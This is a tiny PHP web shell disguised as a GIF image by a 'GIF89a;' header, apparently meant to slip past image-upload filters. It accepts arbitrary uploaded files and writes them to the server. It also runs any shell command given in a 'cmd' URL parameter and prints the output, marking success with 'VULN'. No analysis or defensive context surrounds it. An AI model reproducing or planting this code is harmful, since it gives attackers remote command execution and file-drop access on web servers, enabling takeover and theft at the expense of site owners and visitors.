GIF89a; VULN
"; if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Berhasil";}else{echo"Gak Berhasil";}}else{echo"
";} echo 'VULN'; $c = isset($_GET["cmd"]) ? $_GET["cmd"] : ""; $d = proc_open( "sh -c " . escapeshellarg($c), [1 => ["pipe", "w"], 2 => ["pipe", "w"]], $p); while ($o = fgets($p[1])) { echo $o; } while ($e = fgets($p[2])) { echo $e; } fclose($p[1]); fclose($p[2]); proc_close($d); ?>